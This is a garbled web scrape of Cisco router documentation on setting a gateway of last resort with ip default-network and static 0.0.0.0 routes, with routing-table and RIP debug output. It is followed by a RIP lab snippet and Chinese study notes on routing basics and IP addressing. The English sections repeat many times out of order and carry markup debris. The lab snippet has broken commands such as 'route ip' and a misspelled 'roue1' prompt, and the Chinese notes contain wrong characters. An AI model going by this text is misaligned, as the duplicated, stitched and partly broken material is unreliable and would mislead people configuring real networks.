     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note:?/B>IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

2513#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
2513(config)#ip default-network 171.70.0.0
2513(config)#^Z

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 171.70.24.0 to network 171.70.0.0

 *   171.70.0.0/16 is variably subnetted, 2 subnets, 2 masks
S*      171.70.0.0/16 [1/0] via 171.70.24.0
S       171.70.24.0/24 [1/0] via 131.108.99.2
     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2

If the original static route had been to the major network, the extra step of configuring the default network twice would not have been necessary.

There are still no IP protocols running here. Without any dynamic protocols running, you can configure your router to choose from a number of candidate default routes based on whether the routing table has routes to networks other than 0.0.0.0/0. The ip default-network command allows you to configure robustness into the selection of a gateway of last resort. Rather than configuring static routes to specific next-hops, you can have the router choose a default route to a particular network by checking in the routing table.

If you lose the route to a particular network, the router selects the other candidate default. You can remove the lost route by removing the static route in the configuration as follows:

2513#configure terminal
Enter configuration commands, one per line.  End with CNTL/Z.

2513(config)#no ip route 171.70.24.0 255.255.255.0 131.108.99.2
2513(config)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console

After you remove the static route to the default network, the routing table looks like this:

2513#show ip route

Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
       D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
       N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
       E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
       i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2
       ia - IS-IS inter area, * - candidate default, U - per-user static route
       o - ODR, P - periodic downloaded static route

Gateway of last resort is 161.44.192.2 to network 198.10.1.0

     161.44.0.0/24 is subnetted, 1 subnets
C       161.44.192.0 is directly connected, Ethernet0
     131.108.0.0/24 is subnetted, 1 subnets
C       131.108.99.0 is directly connected, Serial0
S*   198.10.1.0/24 [1/0] via 161.44.192.2
2513#

Use Different Routing Protocols

Gateways of last resort selected using the ip default-network command are propagated differently depending on which routing protocol is propagating the default route. For IGRP and EIGRP to propagate the route, the network specified by the ip default-network command must be known to IGRP or EIGRP. This means the network must be an IGRP- or EIGRP-derived network in the routing table, or the static route used to generate the route to the network must be redistributed into IGRP or EIGRP, or advertised into these protocols using the network command.

RIP advertises a route to 0.0.0.0 if a gateway of last resort is selected using the ip default-network command. This network specified in the ip default-network command need not be explicitly advertised under RIP. For example, note that the gateway of last resort on this router was learned using the combination of the ip route and ip default-network commands. If you enable RIP on this router, RIP advertises a route to 0.0.0.0 (although not to the Ethernet0 network because of split-horizon):

2513(config)#router rip
2513(config-router)#network 161.44.0.0
2513(config-router)#network 131.108.0.0
2513(config-router)#^Z
2513#
%SYS-5-CONFIG_I: Configured from console by console
2513#debug ip rip

*Mar  2 07:39:35.504: RIP: sending v1 update to 255.255.255.255 via Ethernet0 (161.44.192.1)
*Mar  2 07:39:35.508: RIP: build update entries
*Mar  2 07:39:35.508:   network 131.108.0.0 metric 1
*Mar  2 07:39:35.512: RIP: sending v1 update to 255.255.255.255 via Serial0 (131.108.99.1)
*Mar  2 07:39:35.516: RIP: build update entries
*Mar  2 07:39:35.520:   subnet 0.0.0.0 metric 1
*Mar  2 07:39:35.524:   network 161.44.0.0 metric 1

The default route announced using the ip default-network command is not propagated by Open Shortest Path First (OSPF). For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?.

The default route announced using the ip default-network command is not propagated by IS-IS.

ip route 0.0.0.0 0.0.0.0

Creating a static route to network 0.0.0.0 0.0.0.0 is another way to set the gateway of last resort on a router. As with the ip default-network command, using the static route to 0.0.0.0 is not dependent on any routing protocols. However, ip routing must be enabled on the router.

Note:?/B>IGRP does not understand a route to 0.0.0.0. Therefore, it cannot propagate default routes created using the ip route 0.0.0.0 0.0.0.0 command. Use the ip default-network command to have IGRP propagate a default route.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

EIGRP propagates a route to network 0.0.0.0, but the static route must be redistributed into the routing protocol.

In earlier versions of RIP, the default route created using the ip route 0.0.0.0 0.0.0.0 was automatically advertised by RIP routers. In Cisco IOS Software Release 12.0T and later, RIP does not advertise the default route if the route is not learned via RIP. It may be necessary to redistribute the route into RIP.

The default routes created using the ip route 0.0.0.0 0.0.0.0 command are not propagated by OSPF and IS-IS. Additionally, this default cannot be redistributed into OSPF or IS-IS using the redistribute command. Use the default-information originate command to generate a default route into an IS-IS or OSPF routing domain. For more detailed information on behavior of default routes with OSPF, refer to How Does OSPF Generate Default Routes?

This is an example of configuring a gateway of last resort using the ip route 0.0.0.0 0.0.0.0 command:

router-3#configure terminal
   Enter configuration commands, one per line. End with CNTL/Z.
   router-3(config)#ip route 0.0.0.0 0.0.0.0 170.170.3.4
   router-3(config)#^Z
   router-3#

   router-3#show ip route
   Codes: C - connected, S - static, I - IGRP, R - RIP, M - mobile, B - BGP
   D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area
   N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2
   E1 - OSPF external type 1, E2 - OSPF external type 2, E - EGP
   i - IS-IS, L1 - IS-IS level-1, L2 - IS-IS level-2, * - candidate default
   U - per-user static route, o - ODR

Gateway of last resort is 170.170.3.4 to network 0.0.0.0

 170.170.0.0/24 is subnetted, 2 subnets
   C 170.170.2.0 is directly connected, Serial0
   C 170.170.3.0 is directly connected, Ethernet0
   S* 0.0.0.0/0 [1/0] via 170.170.3.4
   router-3#
   router-3#

Note:?/B>If you configure multiple networks as candidate default routes using the ip default-network command, the network that has the lowest administrative distance is chosen as the network for the gateway of last resort. If all the networks have the same administrative distance then the network listed first in the routing table (show ip route lists the routing table) is chosen as the network for the gateway of last resort. If you use both the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to configure candidate default networks, and the network used by the ip default-network command is known statically, the network defined with the ip default-network command takes precedence and is chosen for the gateway of last resort. Otherwise if the network used by the ip default-network command is derived by a routing protocol, the ip route 0.0.0.0 0.0.0.0 command, which has a lower administrative distance, takes precedence and is chosen for the gateway of last resort. If you use multiple ip route 0.0.0.0 0.0.0.0 commands to configure a default route, traffic is load-balanced over the multiple routes.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

Summary

Use the ip default-gateway command when ip routing is disabled on a Cisco router. Use the ip default-network and ip route 0.0.0.0 0.0.0.0 commands to set the gateway of last resort on Cisco routers that have ip routing enabled. The way in which routing protocols propagate the default route information varies for each protocol.

R1

route1(config)#route ip

roue1(config-router)#network 192.168.1.0

roue1(config-router)#network 192.168.101.0

R2

route1(config)#route ip

roue1(config-router)#network 192.168.1.0

roue1(config-router)#network 192.168.100.0

tips:The others is as same as lab5.

2005年07月21日

第 一 章 : 路 由 选 择 原 理
1.1路由选择基础知识
路由是将对象从一个地方转达发到另一个地方的一个中继过程
学习和维持网络拓朴结构知识的机制被认为是路由功能。渡越数据流经路由器进入接口
穿过路由器被移送到外出接口的过程,是另一项单独的功能,被认为是交换/转发功能。路由设备必须同时具有路由和交换的功能才可以作为一台有效的中继设备。
为了进行路由,路由器必须知道下面三项内容:
l路由器必须确定它是否激活了对该协议组的支持;
l路由器必须知道目的地网络;
l路由器必须知道哪个外出接口是到达目的地的最佳路。 


路由选择协议通过度量值来决定到达目的地的最佳路径。小度量值代表优选的路径;如果两条或更多路径都有一个相同的小度量值,那么所有这些路径将被平等地分享。通过多条路径分流数据流量被称为到目的地的负载均衡。

执行路由*作所需要的信息被包含在路由器的路由表中,它们由一个或多个路由选择协议进程生成。路由表由多个路由条目组成,每个条目指明了以下内容:
l学习该路由所用的机制(动态或手动)
l逻辑目的地
l管理距离
l度量值(它是度量一条路径的总"总开销"的一个尺度)
l去往目的地下一HOP的中继设备(路由器)的地址;
l路由信息的新旧程度
l与要去往目的地网络相关联的接口
使用命令SHOW IP ROUTE可看到以上内容

缺省管理距离的预先分配原则是:人工设置的路由条目优先级高于动态学到路由条目,度量值算法复杂的路由选择协议优先级高于度量值算法简单的路由选择协议。

路由器一般选择具有最小度量值的路径;CISCO路由器的IP环境中如果同时出现了多条度量值最低且相同的路径,那么在这多条路径上将启用负载均衡,C ISCO默认支持4条相同度量值的路径,通过使用"maximum-paths"命令可以认CISCO路由器支持最多达6条相同度量值路径。

RIP是一种用在小到中型TCP/IP网络中采用的路由选择协议,它采用跳数作为度量值,它的负载均衡功能是缺省启用的,RIP决定最佳路径时是不考虑带宽的!!!
IGRP是一种用在中到大型TCP/IP网络中采用的路由选择协议,它采用复合的度量值,它考虑了带宽、延迟、可靠性、负载和最大传输单元(M TU),但缺省地使用了带宽和延时值。IGRP也能进行负载均衡
在路由器启动之后,它立刻试图与其相邻路由设备建立路由关系。该初始通信的目的是为了识别相邻设备,并且开始进行通信并学习网络相结构。建立相邻关系的方法和对拓朴结构的初始学习随路由选择协议的不同而不同。
路由选择协议会交换定期的HELLO消息或定期的路由更新数据包,以维持相邻设备间进行着通信。
在了解了网络拓朴结构,且路由表中已包含了到已知地网络的最佳路径后,向这些目的地的数据转发就可以开始了;)

1.2 路由选择协议

有类别路由选取择(classful routing)概述
不随各网络地址发送子网掩码信息的路由选择协议被称为有类别的选择协议(RIPv1、IGRP)
当采用有类别路由选择协议时,属于同一主类网络(A类、B类和C类)有所有子网络都必须使用同一子网掩码。运行有类别路由选择协议的路由选择协议的路由器将执行下面工作的一项以确定该路由型网络部分:
l如果路由更新信息是关于在接收接口上所配的同一主类网络的,路由器将采用配置在接口上的子网掩码;
l如果路由更新是关于在接收接口上所配的不同主类的网络的,路由器将根据其所属地址类别采用缺省的子网掩码。

有类别归纳路由的生成是由有类别路由选择协议自动处理的

无类别路由选择(classless routing)概述
无类别路由选择协议包括开放最短路径优先(OSPF)、EIGRP、RIPV2、中间系统到中间系统(IS-IS)和边界网关协议版本4(BGP4)。
在同一主类网络中使用不同的掩码长度被称为可变长度的子网掩码(VLSM)。无类别路由选择路由选择协议支持VLSM,因此可以更为有效的设置子网掩码,以满足不同子网对不同主机数目的需求,可以更充分的利用主机地址。

多数距离矢量型路由选择协议产生的定期的、例行的路由更新只传输到直接相连的路由设备。

在纯距离矢量型路由环境中,路由更新包括一个完整的路由表,通过接收相邻设备的全路由表,路由能够核查所有已知路由,然后根据所接收到的更新信息修改本地路由表。解决路由问题的距离矢量法有时被称为" 传闻路由(routing by rumor)"

CISCO IOS支持几种距离矢量型路由选择协议,凶手RIPv1、RIPv2和IGRP。CISCO也直持EIGRP,它是一种高级的距离矢量型路由选择协议。

路由选择协议通常与协议组的网络层关联

大多数距离矢量型路由选择协议采用贝乐曼-福特(Bellman-Ford)算法来计算路由。EIGRP是一种高级的距离矢量路由协议,它采用弥散修正算法(D UAL)

Cisco的IP距离矢量型路由选择协议的比较
特征RIPv1RIPv2IGRPEIGRP
计数到无限XXX
横向距离XXXX
抑制计时器XXX
触发式更新,路由反向 XXXX
负载均衡-等成本路径XXXX
负载均衡-非等成本路径XX
VLSM支持XX
路由算法贝尔曼-福特贝尔曼-福特贝尔曼-福特DUAL
度量值跳数跳数复合复合
跳数限制1515100100
易扩展性小小中大
注:IGRP和EIGRP的跳数限制缺省为100,但是可以配置到最大为255。

链路状态型路由选择协议只当网络拓朴结构发生变化时才生成路由更新数据包。当链路状态发生变化时,检测到这一变化的设备就生成一个关于该链路(路由)的链路状态通告(L SA)。随后LSA通过一个特殊的多目组播地址被传播给所有相邻设备。每台路由设备都会保留LSA拷贝,并向其相邻设备转发该LSA(这个过程变称为扩散f looding)然后更新其拓朴结构数据库(这是一个包含网络所有链路状态信息表)。LSA扩散被用于确保所有路由设备都能了解到这个变化,这样它们就能够更新它们的数据,并生成一个更新过的、反映新的网络拓朴结构的路由表。
Cisco的链路状态型路由选择协议的比较
特征OSPFIS-ISEIGRP
要求体系化拓朴结构XX
保留对所有可能路由的了解XXX
路由归纳-人工XXX
路由归纳-自动X
事件触发式通告XXX
负载均衡-等成本路径XXX
负载均衡-非等成本路径X
VLSM支持XXX
路由算法DijkstraIS-ISDUAL
度量值链路成本(带宽)链路成本(带宽)复合
跳数限制无1024100
易扩展性大很大大
各路由器中的路由进程都必须留有到各可能目的地逻辑网络的无环路单路径,当所有路由表都达到同步,且每个路由表都包含有到各目的地网络的一条可用路由时,网络就达到了收敛状态。收敛是在网络拓朴结构发生变化后,比如增加了新的路由或现有路由的状态发生了变化后,与路由表同步相关联的活动。
收敛时间是网络中所有路由对当前拓朴结构的认知达到一致所需的时间,网络的大小、所使用的路由选择协议以及众多可配置的计时器都能够影响收敛时间。

有两种检测的方法:
l当物理层或数据链路层没能接收到一定数量(通常是3)的连续keepalive消息时,就认为该链路失效。
l当路由选择协议没能接收到一定数量(通常是3)的连续Hello消息或路由更新或相类似消息时,就认为该链路失效了。

大多数路由选择协议都具有防止在链路状态转换过程中产生拓朴结构环路用的计时器。

第 二 章 扩 展 I P 地 址
Internet的发展快的令人难以置信。这种迅猛发展导致了地址方面的两大挑战:
lIP地址的耗尽
l路由表的增长和可管理性

IP寻址解决方案:
通过在IP地址中启用更多的分级层来减慢IP地址的消耗及减少Internet路由表条目的
量。这些解决方案包括:
l子网掩码
l私有网络的地址分配
l网络地址转换(NAT)
l体系化编址
l可变长度子网掩码(VLSM)
l路由归纳
l无类别域间路由(CIDR)

IP地址所属类别:
地址的第一字节(十进制)地址类别
1~126A类
128~191B类
192~223C类
224~239D类
240~255E类
D类地址还没有被广泛使用,它是多目组播地址;一些路由选择协议所使用的D类多目组播地址如下:
OSPF—–224.0.0.5和224.0.0.6
RIPv2—–224.0.0.9
EIGRP—-224.0.0.10

体系化编址:
体系化编址很像我们打电话一般,每个电话局并不需要知道全国的电话号码,你打电话如果第一位不是0的话总机就到自己的电话条目中找到链路然后接过, 如果是0,那么它就看是那个区号,比如是0791-6221155,它就把这信息传给南昌电话局(0791)由南昌话局找到6221155这链路并接通,这样自己的总机就不需要存有外地的话条目了, 让别人也有口饭吃吧J,原理同样可以用在路由器中.

体系化编址的优点:
l减少路由条目的数量
